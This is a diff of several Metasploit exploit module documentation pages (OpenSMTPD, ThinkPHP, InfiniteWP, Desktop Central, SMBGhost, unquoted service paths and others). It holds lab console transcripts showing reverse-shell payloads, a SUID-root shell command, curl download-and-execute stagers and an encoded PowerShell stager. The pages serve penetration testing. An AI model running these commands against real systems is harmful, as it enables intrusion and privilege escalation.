+msf5 exploit(multi/handler) > [*] Command shell session 4 opened (192.168.159.128:4444 -> 192.168.159.128:35516) at 2020-04-16 14:54:39 -0400
+
+msf5 exploit(multi/handler) > sessions -i 4
+[*] Starting interaction with 4...
+
+id
+uid=1000(smcintyre) gid=1000(smcintyre) groups=1000(smcintyre),10(wheel),974(wireshark),975(docker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+```
@@ -17,25 +17,23 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-### Targets
-
-```
-Id  Name
--  ----
-0   /usr/lib/crontab.local
-```
-
 ## Verification Steps

 Follow [Setup](#setup) and [Scenarios](#scenarios).

+## Targets
+
+### 0
+
+This uses `/usr/lib/crontab.local` to execute code.
+
 ## Options

-**MOVEMAIL**
+### MOVEMAIL

 Set this to the absolute path to the SUID-root `movemail` executable.

-**CMD**
+### CMD

 If your payload is `cmd/unix/generic` (suggested default), set this to
 the command you want to run as root. The provided default will create a
@@ -47,19 +45,29 @@ SUID-root shell at `/tmp/sh`.

 ```
 msf5 > use exploit/unix/local/emacs_movemail
-msf5 exploit(unix/local/emacs_movemail) > show missing
+msf5 exploit(unix/local/emacs_movemail) > options

 Module options (exploit/unix/local/emacs_movemail):

-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SESSION                   yes       The session to run this module on.
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   MOVEMAIL  /etc/movemail    yes       Path to movemail
+   SESSION                    yes       The session to run this module on.


 Payload options (cmd/unix/generic):

-   Name  Current Setting  Required  Description
-   ----  ---------------  --------  -----------
+   Name  Current Setting                       Required  Description
+   ----  ---------------                       --------  -----------
+   CMD   cp /bin/sh /tmp && chmod u+s /tmp/sh  yes       The command string to execute
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   /usr/lib/crontab.local
+

 msf5 exploit(unix/local/emacs_movemail) > set session -1
 session => -1
@@ -11,21 +11,20 @@ root or nobody user, depending on the kind of grammar OpenSMTPD uses.
 1. Download [OpenBSD 6.6](https://cdn.openbsd.org/pub/OpenBSD/6.6/amd64/install66.iso)
 2. Install the system

-### Targets
-
-```
-Id  Name
--  ----
-0   OpenSMTPD < 6.6.4 (automatic grammar selection)
-```
-
 ## Verification Steps

 Follow [Setup](#setup) and [Scenarios](#scenarios).

+## Targets
+
+### 0
+
+This targets OpenSMTPD versions < 6.6.4 by automatically selecting the
+appropriate grammar.
+
 ## Options

-**SESSION**
+### SESSION

 Set this to a valid session ID on an OpenBSD target.

@@ -35,13 +34,17 @@ Set this to a valid session ID on an OpenBSD target.

 ```
 msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
-msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > show missing
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > options

 Module options (exploit/unix/local/opensmtpd_oob_read_lpe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
+   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT  25               yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)


 Payload options (cmd/unix/reverse_netcat):
@@ -49,6 +52,15 @@ Payload options (cmd/unix/reverse_netcat):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   OpenSMTPD < 6.6.4 (automatic grammar selection)
+

 msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
 lhost => 172.16.249.1
@@ -61,7 +73,7 @@ msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
 [*] Started reverse TCP handler on 172.16.249.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] OpenSMTPD 6.6.0 is using new grammar
-[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
+[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794.
 [*] Started service listener on 0.0.0.0:25
 [*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
 [*] Client 172.16.249.137:37747 connected
@@ -106,7 +118,7 @@ msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
 [*] Started reverse TCP handler on 172.16.249.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] OpenSMTPD 6.0.4 is using old grammar
-[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794
+[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794.
 [*] Started service listener on 0.0.0.0:25
 [*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
 [*] Client 172.16.249.138:10203 connected
@@ -18,26 +18,24 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-### Targets
-
-```
-Id  Name
--  ----
-0   @(#)version.c       5.51 (Berkeley) 5/2/86
-```
-
 ## Verification Steps

 Follow [Setup](#setup) and [Scenarios](#scenarios).

+## Targets
+
+### 0
+
+This targets `sendmail` version 5.51 from 1986-05-02.
+
 ## Options

-**RPORT**
+### RPORT

 Set this to the target port. The default is 25 for `sendmail`, but the
 port may be forwarded when NAT (SLiRP) is used in SIMH.

-**PAYLOAD**
+### PAYLOAD

 Set this to a Unix command payload. Currently, only `cmd/unix/reverse`
 and `cmd/unix/generic` are supported.
@@ -48,13 +46,14 @@ and `cmd/unix/generic` are supported.

 ```
 msf5 > use exploit/unix/smtp/morris_sendmail_debug
-msf5 exploit(unix/smtp/morris_sendmail_debug) > show missing
+msf5 exploit(unix/smtp/morris_sendmail_debug) > options

 Module options (exploit/unix/smtp/morris_sendmail_debug):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT   25               yes       The target port (TCP)


 Payload options (cmd/unix/reverse):
@@ -62,6 +61,15 @@ Payload options (cmd/unix/reverse):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   @(#)version.c       5.51 (Berkeley) 5/2/86
+

 msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1
@@ -15,21 +15,19 @@ SMTP interaction with OpenSMTPD to execute a command as the root user.
 4. Execute `/etc/rc.d/smtpd restart` to restart OpenSMTPD
 5. Execute `ifconfig` and look for an appropriate target IP

-### Targets
-
-```
-Id  Name
--  ----
-0   OpenSMTPD < 6.6.1
-```
-
 ## Verification Steps

 Follow [Setup](#setup) and [Scenarios](#scenarios).

+## Targets
+
+### 0
+
+This targets OpenSMTPD versions < 6.6.1.
+
 ## Options

-**RCPT_TO**
+### RCPT_TO

 Set this to a valid mail recipient. The default is `root`.

@@ -39,13 +37,15 @@ Set this to a valid mail recipient. The default is `root`.

 ```
 msf5 > use exploit/unix/smtp/opensmtpd_mail_from_rce
-msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > show missing
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > options

 Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):

-   Name    Current Setting  Required  Description
-   ----    ---------------  --------  -----------
-   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   RCPT_TO  root             yes       Valid mail recipient
+   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT    25               yes       The target port (TCP)


 Payload options (cmd/unix/reverse_netcat):
@@ -53,6 +53,15 @@ Payload options (cmd/unix/reverse_netcat):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   OpenSMTPD < 6.6.1
+

 msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 172.16.249.137
 rhosts => 172.16.249.137
@@ -0,0 +1,150 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits one of two PHP injection vulnerabilities in the
+ThinkPHP web framework to execute code as the web user.
+
+Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
+vulnerable to a separate vulnerability. The module will automatically
+attempt to detect the version of the software.
+
+Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
+
+### Setup
+
+1. `git clone https://github.com/vulhub/vulhub`
+2. `cd vulhub/thinkphp/5-rce` for 5.0.20 or `cd vulhub/thinkphp/5.0.23-rce` for 5.0.23
+3. `docker-compose up -d`
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Options
+
+### SRVPORT
+
+If you are testing the [Docker container](#setup), which binds to port
+8080 by default, and you are using an HTTP(S) command stager, set this
+to a different port to bind the command stager server to.
+
+## Scenarios
+
+### ThinkPHP 5.0.20 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce)
+
+```
+msf5 > use exploit/unix/webapp/thinkphp_rce
+msf5 exploit(unix/webapp/thinkphp_rce) > options
+
+Module options (exploit/unix/webapp/thinkphp_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8080             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf5 exploit(unix/webapp/thinkphp_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/webapp/thinkphp_rce) > set lhost 192.168.1.3
+lhost => 192.168.1.3
+msf5 exploit(unix/webapp/thinkphp_rce) > set cmdstager::flavor curl
+cmdstager::flavor => curl
+msf5 exploit(unix/webapp/thinkphp_rce) > set srvport 8888
+srvport => 8888
+msf5 exploit(unix/webapp/thinkphp_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.3:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. ThinkPHP 5.0.20 is a vulnerable version.
+[*] Targeting ThinkPHP 5.0.20 automatically
+[*] Using URL: http://0.0.0.0:8888/IV0dIafe
+[*] Local IP: http://192.168.1.3:8888/IV0dIafe
+[*] Generated command stager: ["curl -so /tmp/UJiMvCsm http://192.168.1.3:8888/IV0dIafe;chmod +x /tmp/UJiMvCsm;/tmp/UJiMvCsm;rm -f /tmp/UJiMvCsm"]
+[*] Executing command: curl -so /tmp/UJiMvCsm http://192.168.1.3:8888/IV0dIafe;chmod +x /tmp/UJiMvCsm;/tmp/UJiMvCsm;rm -f /tmp/UJiMvCsm
+[*] Client 192.168.1.3 (curl/7.52.1) requested /IV0dIafe
+[*] Sending payload to 192.168.1.3 (curl/7.52.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3012516 bytes) to 192.168.1.3
+[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:64475) at 2020-04-13 01:02:13 -0500
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: no-user @ c94d71fb70ec (uid=33, gid=33, euid=33, egid=33)
+meterpreter > sysinfo
+Computer     : 172.21.0.2
+OS           : Debian 9.4 (Linux 4.19.76-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+### ThinkPHP 5.0.23 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce)
+
+```
+msf5 exploit(unix/webapp/thinkphp_rce) > set rport 8081
+rport => 8081
+msf5 exploit(unix/webapp/thinkphp_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.3:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. ThinkPHP 5.0.23 is a vulnerable version.
+[*] Targeting ThinkPHP 5.0.23 automatically
+[*] Using URL: http://0.0.0.0:8888/zD3iTDja
+[*] Local IP: http://192.168.1.3:8888/zD3iTDja
+[*] Generated command stager: ["curl -so /tmp/XnysdYyf http://192.168.1.3:8888/zD3iTDja;chmod +x /tmp/XnysdYyf;/tmp/XnysdYyf;rm -f /tmp/XnysdYyf"]
+[*] Executing command: curl -so /tmp/XnysdYyf http://192.168.1.3:8888/zD3iTDja;chmod +x /tmp/XnysdYyf;/tmp/XnysdYyf;rm -f /tmp/XnysdYyf
+[*] Client 192.168.1.3 (curl/7.52.1) requested /zD3iTDja
+[*] Sending payload to 192.168.1.3 (curl/7.52.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3012516 bytes) to 192.168.1.3
+[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.3:64482) at 2020-04-13 01:03:29 -0500
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: no-user @ 9a6301c3c31d (uid=33, gid=33, euid=33, egid=33)
+meterpreter > sysinfo
+Computer     : 172.22.0.2
+OS           : Debian 9.6 (Linux 4.19.76-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -22,33 +22,31 @@ API change. Tested against 4.8.3.
 2. Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
 3. Follow <https://wordpress.org/plugins/iwp-client/#installation>

-### Targets
-
-```
-Id  Name
--  ----
-0   InfiniteWP Client < 1.9.4.5
-```
-
 ## Verification Steps

 Follow [Setup](#setup) and [Scenarios](#scenarios).

+## Targets
+
+### 0
+
+This targets InfiniteWP Client versions < 1.9.4.5.
+
 ## Options

-**USERNAME**
+### USERNAME

 Set this to a known, valid administrator username. Authentication will
 be bypassed for this user.

-**PLUGIN_FILE**
+### PLUGIN_FILE

 Set this to a plugin file to insert the payload into, relative to the
 plugins directory, which is normally `/wp-content/plugins`. The file
 must exist and be writable by the web user. It will be overwritten and
 later restored.

-**VerifyContents**
+### VerifyContents

 Verify that the restored contents of `PLUGIN_FILE` match the original.
 This is the default setting.
@@ -59,13 +57,20 @@ This is the default setting.

 ```
 msf5 > use exploit/unix/webapp/wp_infinitewp_auth_bypass
-msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show missing
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > options

 Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass):

-   Name    Current Setting  Required  Description
-   ----    ---------------  --------  -----------
-   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   PLUGIN_FILE  index.php        yes       Plugin file to edit
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT        80               yes       The target port (TCP)
+   SSL          false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI    /                yes       The base path to the wordpress application
+   USERNAME     admin            yes       WordPress username
+   VHOST                         no        HTTP server virtual host


 Payload options (php/meterpreter/reverse_tcp):
@@ -73,6 +78,15 @@ Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   InfiniteWP Client < 1.9.4.5
+

 msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1
@@ -16,23 +16,27 @@ Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.
 1. Download a vulnerable installer (I used 10.0.465 x64)
 2. Install the software in Windows (I used Windows 10)

-### Targets
-
-```
-Id  Name
--  ----
-0   Windows Command
-1   Windows Dropper
-2   PowerShell Stager
-```
-
 ## Verification Steps

 Follow [Setup](#setup) and [Scenarios](#scenarios).

+## Targets
+
+### 0
+
+This executes a Windows command.
+
+### 1
+
+This uses a Windows dropper to execute code.
+
+### 2
+
+This uses a PowerShell stager to execute code.
+
 ## Options

-**WfsDelay**
+### WfsDelay

 If the target is slow to shell, increase this value. The default is 60
 seconds, on a fresh install and calibrated to my test environment.
@@ -45,20 +49,39 @@ seconds, on a fresh install and calibrated to my test environment.
 msf5 > use exploit/windows/http/desktopcentral_deserialization
 msf5 exploit(windows/http/desktopcentral_deserialization) > set payload windows/x64/meterpreter/reverse_tcp
 payload => windows/x64/meterpreter/reverse_tcp
-msf5 exploit(windows/http/desktopcentral_deserialization) > show missing
+msf5 exploit(windows/http/desktopcentral_deserialization) > options

 Module options (exploit/windows/http/desktopcentral_deserialization):

-   Name    Current Setting  Required  Description
-   ----    ---------------  --------  -----------
-   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8383             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host


 Payload options (windows/x64/meterpreter/reverse_tcp):

-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST                   yes       The listen address (an interface may be specified)
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST                      yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   PowerShell Stager
+

 msf5 exploit(windows/http/desktopcentral_deserialization) > set rhosts 172.16.249.139
 rhosts => 172.16.249.139
@@ -68,8 +91,7 @@ msf5 exploit(windows/http/desktopcentral_deserialization) > run

 [*] Started reverse TCP handler on 172.16.249.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
-[*] Detected Desktop Central version 100465
-[+] The target appears to be vulnerable. 100465 is an exploitable version
+[+] The target appears to be vulnerable. Desktop Central 100465 is a vulnerable build.
 [*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
 [*] Powershell command length: 2502
 [*] Serializing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAImual4CA7VWa2+bSBT9nEj5D6iyBCiOjV0nTSNV2gFDjGu7psSP2GutCAww8QAuDLFJt/9979iQptt0t11pERLzuM9zz8zFz2OXkSQWEuuy/Ub4fHJ8NHZSJxKk2pr6al4XarkiHx3Beu1+aAbCO0Faos2mm0QOiVdXV1qepjhmh3njGjOUZTi6owRnkiz8KcxCnOKzD3f32GXCZ6H2R+OaJncOLcUKzXFDLJyh2ON7g8R1eDgNe0MJk8Tffxfl5Vlr1dA/5Q7NJNEuMoajhkepKAtfZO7wpthgSRwSN02yxGeNGYlftxuTOHN8PAJrD3iIWZh4mShDFvCmmOVpLOzz4QYO25IIw3GauMjzUpxlYl1YctPL1eo3aVn6/ZjHjES4YcYMp8nGxukDcXHW6DmxR/FH7K9Ay2YpiYOVLIPYQ7LGUi3OKa0Lv2JGGuFthdrPKknPlUBqzFK5DoV8Ic9h4uUUHzTFFwI9FF+G50AAQO7LyfHJsV/RxX2rec/ZAqOj5X6MITppnGRkL/dOUOrCEPw4LEkLmNZu0hzLqydshVrkTOs/Vm9VslyyVzzC0nKaEG8FKmU9a87FoMvXf8zLLvZJjLtF7ETEragnvQQy9inep9ioxEYQlCSWG9jrYooDh3HYeK2/U9Mjwp501ZxQD6fIhUJlEBXUUP42mEMlJNGMhzgCiA5zIF/NB8LjSrokeVF553MQEjXqZFldGOdw4ty6YGOHYq8uoDgj5RbKWbIfil/DHeaUEdfJWGVuJVc4lv60JM5YmrtQNcj9xt5glziUQ1EXesTDamGToPIrvgiE5lAK5wAsPUAhYIUDYDPOhRRC5HWXGzZmZrShOAKR/ck3qBPAOS/JvueOE2BP/HuAFZkPzOVQVBg8Cw/qa9OE1YUpSRlcIBxWTqL/5P3ZzbGPQ0txWQipOh5LtWCc1LUd4nwsMdkjkDLI3kiTSHUyfNE53BHSq6ZOuufjbvKI4NGNj9ZUtSfThTn0+tQ2mX2rk8EkDE3SMgOYFxM9GDNl8/7mpte3uz2Udnehj8zM1HtqYbVU5PbIm2lfnUxAj2gD635nIk+Ngnlwq23NcTg3wZE2CMwAvqoZuqqyUAJVMbSBrYY6UVBgWz2r01qYzUuqkkfbtFFv9uTvyY/e6fTmuxs0GvZRaHzwjFbb2Ouvuf5ifT3o6vu5y+fWbaYTHfzoxq01DfFsulFnurGwphszON0G1nTQ7BihCusm2Q02dhOeVqv/EHuPQ3r5OIRwremiT/DCDHARIAsh+zam9t1WQ6rhpmr3HE2MCaytb8x4Z91thl5x22u+nQ4J3iTI0hEyKJzHCDnbbrM1S95b03Nroiu7YqLstvp9c6uT/nZdfifXFxdB0++Mm1PbjHtOqEK8Rb+zJv1T2AP6KLd+c8rx6+px8zGeU2estRJ612xNSPeNqpoE90dDl35SIWewcW7dJVrbDX2IyQwurWCexG1nDXZnAYLoID+os983QUfNKVlPTufcVn+rRP2dwuOM+pcQW7uMAbHYnDchPtTr2lp8bZvztocNtXnqvnvFGQuUrRV09IyKP+ohQyfNQocCRaE5VJeCkaRGed+PE8I1JOnwm7DGaYwpdFnow9XZQpQmLu83+9YAve7QgXhDnMDwdfvFkSw8Ccpf+1C1dHW1gDDhtO5QY4DjgIV1ZfdaUaCnKLuOAjn+fGJasikkMFTnHYnDcjBL92Zlfnpr6eye/M9glZdGCB/v38D6uvYPuz8FoFLfJ/zd6rcLvwTnr6c+cwgDURvuPYoPXfdlBEpmPPst4YWByvvlw/8rP+TsbAR/KyfHfwHyG93zwwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
@@ -0,0 +1,102 @@
+## Vulnerable Application
+A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3)
+protocol that can be leveraged to execute code on a vulnerable server. This
+local exploit implementation leverages this flaw to elevate itself before
+injecting a payload into winlogon.exe.
+
+This vulnerability was patched in March 2020 but prior to that enough
+information was publicly available to trigger a crash which led to pre-patch
+workarounds. The official recommendation from [Microsoft][1] at the time was to
+disable SMBv3 compression, a feature which this exploit relies on. The module's
+check method will determine this value using the registry to identify whether or
+not compression has been disabled.
+
+Other recommendations included restricting access to TCP port 445 via firewalls.
+Given that this is a local exploit and the connection is made to the local host
+this is likely an ineffective measure against this particular implementation of
+the vulnerability.
+
+### Installation And Setup
+Windows 10 versions 1903 and 1909 (without the patch) are vulnerable out of the
+box. The default setting is to have SMBv3 compression enabled.
+
+## Verification Steps
+
+  1. Start msfconsole
+  1. Get a Meterpreter session on a vulnerable host
+  1. Do: `use exploit/windows/local/cve_2020_0796_smbghost`
+  1. Set the `SESSION` and `PAYLOAD` options
+  1. Do: `run`
+  1. You should get a shell.
+
+## Scenarios
+
+### Windows 10 Version 1909 Build 18363.418 x64
+
+```
+msf5 exploit(windows/local/cve_2020_0796_smbghost) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: DESKTOP-PKLKKF7\user
+meterpreter > sysinfo
+Computer        : DESKTOP-PKLKKF7
+OS              : Windows 10 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 5
+Meterpreter     : x64/windows
+meterpreter > getsystem 
+[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
+[-] Named Pipe Impersonation (In Memory/Admin)
+[-] Named Pipe Impersonation (Dropper/Admin)
+[-] Token Duplication (In Memory/Admin)
+meterpreter > background 
+[*] Backgrounding session 1...
+msf5 exploit(windows/local/cve_2020_0796_smbghost) > show options 
+
+Module options (exploit/windows/local/cve_2020_0796_smbghost):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION  -1               yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows 10 v1903-1909 x64
+
+
+msf5 exploit(windows/local/cve_2020_0796_smbghost) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Windows Build Number = 18363
+[+] The target appears to be vulnerable.
+[*] Launching notepad to host the exploit...
+[+] Process 4508 launched.
+[*] Reflectively injecting the exploit DLL into 4508...
+[*] Injecting exploit into 4508...
+[*] Exploit injected. Injecting payload into 4508...
+[*] Payload injected. Executing exploit...
+[*] Sending stage (206403 bytes) to 192.168.159.153
+[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+```
+
+[1]: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005
@@ -0,0 +1,161 @@
+## Vulnerable Application
+
+Commonly known as Trusted Service Path, or Unquoted Service path, this exploits a behavior of windows service.
+When a service calls an executable, a full path is given.  If the full path contains a space,
+Windows will attempt to execute a file up to the space, with `.exe` appended.
+If the executable isn't found, it keeps going until the full path or the next space (and repeat).
+
+@sumitvgithub had an excellent write-up on this
+[here](https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae)
+
+As is documented in that write-up, if the executable is C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
+
+Windows will attempt to run the following, in order.
+
+  1.  C:\Program.exe
+  2.  C:\Program Files\A.exe
+  3.  C:\Program Files\A Subfolder\B.exe
+  4.  C:\Program Files\A Subfolder\B Subfolder\C.exe
+  5.  C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe
+
+To exploit this, we simply need to go in reverse order to see if we're able to write a payload to those locations.
+In Win7+ the deeper folders are more likely to succeed based on default Windows permissions for users.
+
+Then, a service restart is required.  Often a user won't be able to do this,
+so the payload is left on disk as a reboot or service restart will trigger the payload to launch.
+
+The service will fail to start as long as the payload remains on disk.  Manual cleanup of the payload
+is required.
+
+### Creating a Vulnerable Service
+
+This is sourced from @sumitvgithub's write-up
+[here](https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae)
+
+With an administrator command prompt, execute the following:
+
+```
+sc create "Some Vulnerable Service" binpath= "C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe" Displayname= "Vuln Service DP" start= auto
+mkdir "C:\Program Files\A Subfolder\B Subfolder\C Subfolder"
+icacls "C:\Program Files\A Subfolder" /grant "BUILTIN\Users":W
+```
+
+This creates a vulnerable service, with `A Subfolder` being vulnerable to user writes.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a user shell
+  3. Do: ```use exploits/windows/local/unquoted_service_path```
+  4. Do: ```set session #```
+  5. Do: ```run```
+  6. You should either get a shell, or need to start a `multi/handler` and have the target restarted.
+
+## Options
+
+### QUICK
+
